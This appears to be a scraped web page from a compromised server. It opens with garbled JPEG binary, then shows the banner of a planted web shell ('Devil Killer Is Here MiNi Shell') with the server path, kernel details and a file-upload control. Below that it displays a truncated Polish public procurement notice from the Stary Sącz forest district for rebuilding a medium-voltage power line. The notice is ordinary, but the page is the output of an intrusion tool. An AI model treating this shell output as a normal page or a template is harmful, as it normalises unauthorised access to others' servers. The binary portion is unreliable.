JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211018/0023537701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa elektroenergetycznej linii średniego napięcia - II postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Stary Sącz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 350545642</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Magazynowa 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stary Sącz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-340</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">starysacz@krakow.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://starysacz.krakow.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka Leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa elektroenergetycznej linii średniego napięcia - II postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e27e2136-3001-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00235377</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00117389/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa linii energetycznej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-e27e2136-3001-11ec-a3fb-0a24f8cd532c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lasy_starysacz/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest wyłącznie w języku polskim.<br/>2. Komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności składanie<br/>oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji (innych niż<br/>oferta Wykonawcy), odbywa się przy użyciu środków komunikacji elektronicznej, tj.<br/>a) platformy zakupowej OpenNexus oraz<br/>b) skrzynki email Nadleśnictwa Stary Sącz.<br/>3. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie<br/>zamówienia publicznego, musi posiadać konto na platformazakupowa.pl które jest<br/>bezpłatne.<br/>4. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia,<br/>akceptuje warunki korzystania z platformy zakupowej, tj. OpenNexus, określone w<br/>Regulaminie korzystania z platformy (https://platformazakupowa.pl/strona/1-<br/>regulamin) zakupowej oraz zobowiązuje się, korzystając z platformy, przestrzegać tychże postanowień.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem platformy zakupowej<br/>wynosi 25 MB.<br/>6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów lub oświadczeń<br/>elektronicznych, podmiotowych środków dowodowych lub cyfrowego odwzorowania<br/>podmiotowych środków dowodowych oraz innych informacji sporządzonych<br/>pierwotnie w postaci papierowej, przyjmuje się datę wpływu.<br/>7. Wykonawca może zwrócić się do zamawiającego za pośrednictwem platformy<br/>zakupowej lub na adres e-mail: starsacz@krakow.lasy.gov.pl z wnioskiem o<br/>wyjaśnienie treści SWZ. Zamawiający udzieli wyjaśnień niezwłocznie, jednak nie<br/>później niż na 2 dni przed upływem terminu składania ofert (udostępniając je na<br/>stronie internetowej prowadzonego postępowania), pod warunkiem że wniosek o<br/>wyjaśnienie treści SWZ wpłynął do zamawiającego nie później niż na 4 dni przed<br/>upływem terminu składania ofert. W przypadku gdy wniosek o wyjaśnienie treści<br/>SWZ nie wpłynie w terminie, zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz przedłużenia terminu składania ofert. Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/lasy_starysacz/proceedings</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.<br/>Urz. UE L 119 z 4.5.2016 r., str. 1), dalej „RODO”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Nadleśnictwo Stary Sącz, ul.<br/>Magazynowa 5, 33-340 Stary Sącz, tel. +48 18 446 09 91; e-mail:<br/>starysacz@krakow.lasy.gov.pl<br/>2. W sprawach związanych z Pani/Pana danymi osobowymi proszę kontaktować się z<br/>Inspektorem Ochrony Danych (IOD): e-mail: iod@comp-net.pl<br/>3. Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia<br/>postępowania i udzieleniu zamówienia, prowadzenia dokumentacji księgowopodatkowej,<br/>archiwizacji danych, dochodzenia roszczeń lub obrony przed<br/>roszczeniami.<br/>4. Podstawą przetwarzania danych osobowych jest:<br/>1) ustawa z dnia 11 września 2019 r. – Prawo zamówień publicznych;<br/>2) ustawa z dnia 27 sierpnia 2009 r. o finansach publicznych;<br/>3) ustawa z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach;<br/>4) art. 6 pkt.1 lit. c RODO<br/>– przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na<br/>administratorze.<br/>5. Odbiorca lub kategorie odbiorców: podmioty upoważnione na podstawie zawartych<br/>umów powierzenia oraz uprawnione na mocy obowiązujących przepisów prawa, w<br/>szczególności osoby lub podmioty, którym zostanie udostępniona dokumentacja<br/>postępowania na podstawie art. 18 Ustawy Pzp oraz art. 74–76 Ustawy Pzp. Zasada<br/>jawności ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych,<br/>o których mowa w art. 9 ust. 1 RODO (szczególna kategoria danych).<br/>6. Pani/Pana dane osobowe będą przetwarzane przez okres niezbędny do realizacji<br/>celu przetwarzania oraz przez okres wynikający z przepisów w sprawie instrukcji<br/>kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie<br/>organizacji i zakresu działania archiwów zakładowych, w szczególności zgodnie z<br/>art. 78 ust. 1 i 4 Ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy w sprawie zamówienia<br/>publicznego przekracza 4 lata – przez cały okres obowiązywania umowy.<br/>7. Posiada Pani/Pan prawo:<br/>1) żądania dostępu do danych; w przypadku gdy wykonanie tego obowiązku,<br/>wymagałoby niewspółmiernie dużego wysiłku, zamawiający może, zgodnie z art.<br/>75 Ustawy Pzp, żądać od osoby, której dane dotyczą, wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia;<br/>2) żądania sprostowania lub uzupełnienia danych osobowych; zgodnie z art. 76<br/>Ustawy Pzp wykonanie tego obowiązku nie może naruszać integralności<br/>protokołu postępowania oraz jego załączników;<br/>3) usunięcia danych w przypadku, gdy dane osobowe nie są już niezbędne do<br/>celów, w których zostały zebrane, lub w inny sposób przetwarzane;<br/>4) żądania ograniczenia przetwarzania danych osobowych; zgodnie z art. 74 ust. <br/>Ustawy Pzp wykonanie tego obowiązku nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenie postępowania o udzielenie zamówienia.<br/>Pozostałe informacje znajdują się w SWZ w dziale XXIII. Klauzula informacyjna dotycząca przetwarzania danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Przebudowa elektroenergetycznej linii średniego<br/>napięcia, zgodnie z dokumentacją techniczną oraz Specyfikacją Techniczną<br/>Wykonania i Odbioru Robót Budowlanych (STWIORB) stanowiąc załącznik nr 8 do SWZ. Pozostałe informacje znajdują się w SWZ w dziale III. Opis przedmiotu zamówienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232200-4 - Roboty pomocnicze w zakresie linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający informuje, że przewiduje udzielanie zamówienia, o których mowa w<br/>art. 214 ust. 1 pkt 7 ustawy Pzp, polegającego na powtórzeniu podobnych robót<br/>budowlanych jak w zamówieniu podstawowym, zgodnych z przedmiotem<br/>zamówienia podstawowego, o wartości nie większej niż 40% wartości zamówienia<br/>podstawowego. Zostaną one udzielone w przypadku, gdy zaistnieje uzasadniona<br/>potrzeba i możliwość rozszerzenia zamówienia podstawowego oraz zostaną<br/>zapewnione środki finansowe na ten cel. Wysokość wynagrodzenia zamówienia<br/>polegającego na powtórzeniu podobnych usług zostanie ustalona na podstawie cen zawartych w ofercie.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej zamawiający będzie kierował się<br/>następującymi kryteriami, z przypisaniem im odpowiednio wag<br/>1) Cena – 60 %;<br/>2) Okres udzielonej gwarancji – 30 %<br/>3) Termin płatności – 10%<br/>2. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu<br/>wzoru:<br/>C = Cn/Co x100 pkt x 60 %<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych,<br/>Co - cena oferty ocenianej.<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena brutto podana w<br/>formularzu oferty (załącznik nr 1 do SWZ).<br/>2) W ramach kryterium „Okres udzielonej gwarancji” oceniane będzie w oparciu o<br/>przyjęcie przez Wykonawcę zobowiązania umownego na formularzu ofertowym<br/>do udzielenia gwarancji na okres od 24 miesięcy do 48 miesięcy. Ocena zostanie<br/>dokonania przy zastosowaniu wzoru:<br/>G = Go/Gm x 100pkt x 30%<br/>Gdzie:<br/>G - liczba punktów w ramach kryterium „Okres udzielonej gwarancji”<br/>Go - deklarowany przez wykonawcę którego oferta podlega ocenie okres<br/>gwarancji - nie krócej niż 24 m-ce),<br/>Gm – maksymalny okres gwarancji spośród wykonawców składających ofertę<br/>(nie dłużej niż 48 m-cy),<br/>3) W ramach kryterium „Termin płatności” punkty przyznane zostaną za oczekiwany<br/>przez oferenta termin realizacji płatności za wykonanie robót objętych<br/>przedmiotem zamówienia (7, 14, 21, 30 dni), odniesiony do najdłuższego terminu<br/>płatności który wynosi 30 dni. Ocena zostanie dokonania przy zastosowaniu<br/>wzoru:<br/>T=To/Tm x 100 pkt x 10%<br/>Gdzie:<br/>T – oczekiwany przez Wykonawcę termin realizacji płatności<br/>To – oczekiwany przez Wykonawcę termin realizacji płatności<br/>Tm - maksymalny dopuszczalny termin płatności wynoszący 30 dni<br/>3. Zamawiający za najkorzystniejszą uzna ofertę, która uzyska największą liczbę<br/>punktów łącznie ze wszystkich kryteriów. Ocenę łączną oferty stanowi suma<br/>punktów uzyskanych w ramach poszczególnych kryteriów.<br/>4. Oferta może uzyskać w kryteriach oceny ofert maksymalnie 100 punktów.<br/>Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium w procentach (%). Uzyskana liczba punktów w ramach kryterium zaokrąglana będzie do drugiego miejsca po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres udzielania gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu;<br/>2) spełniają warunki udziału w postępowaniu określone przez zamawiającego<br/>w ogłoszeniu o zamówieniu i niniejszej SWZ.<br/>2. Zamawiający wymaga wykazania przez wykonawcę spełnienia warunków<br/>określonych<br/>w art. 112 ust. 2 Ustawy Pzp dotyczących:<br/>1) Uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej,<br/>o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym<br/>zakresie.<br/>2) Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym<br/>zakresie.<br/>3) Sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie<br/>4) Zdolności technicznej i zawodowej.<br/>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca<br/>wykaże, że:<br/>a) w okresie ostatnich pięciu lat przed dniem upływu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonał: co najmniej<br/>dwie roboty budowlane na kwotę: min 50 tys. zł brutto każda, polegające<br/>na robotach budowlanych, w zakres których wchodziła budowa lub<br/>przebudowa lub rozbudowa linii elektroenergetycznej,<br/>b) dysponuje lub będzie dysponował osobą, która będzie pełnić funkcję kierownika<br/>budowy, posiadającą uprawnienia budowlane do kierowania robotami<br/>budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, lub<br/>odpowiadające im ważne uprawnienia budowlane wydane na podstawie<br/>wcześniej obowiązujących przepisów, która w dniu podpisania umowy będzie<br/>członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą Prawo<br/>budowlane oraz ustawą o samorządach zawodowych architektów, inżynierów<br/>budownictwa oraz urbanistów;<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych<br/>lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych Wykonawców, którzy wykonają roboty<br/>budowlane, do realizacji których te zdolności są wymagane. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane wykonają poszczególni Wykonawcy<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie<br/>posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych<br/>interesów, (w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy) może<br/>mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5<br/>lat,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia,<br/>wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na<br/>rzecz których roboty te zostały wykonane, oraz załączeniem dowodów<br/>określających czy te roboty budowlane zostały wykonane należycie, w<br/>szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami<br/>prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego roboty budowlane były wykonywane, a jeżeli<br/>z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – załącznik nr 6<br/>do SWZ;<br/>2) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, a w szczególności odpowiedzialnych za kierowanie robotami<br/>budowlanymi, wraz z informacją na temat ich kwalifikacji zawodowych a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami – załącznik nr 7 do SWZ.<br/>3) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, sporządzony nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Pozostałe informacje znajdują się w SWZ dział IX. Informacja o podmiotowych środkach dowodowych</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert<br/>oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw<br/>do wykluczenia z postępowania – zgodnie z załącznikiem nr 2 do SWZ;<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne<br/>potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. Pozostałe informacje znajdują się w SWZ dział IX. Informacja o podmiotowych środkach dowodowych</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków 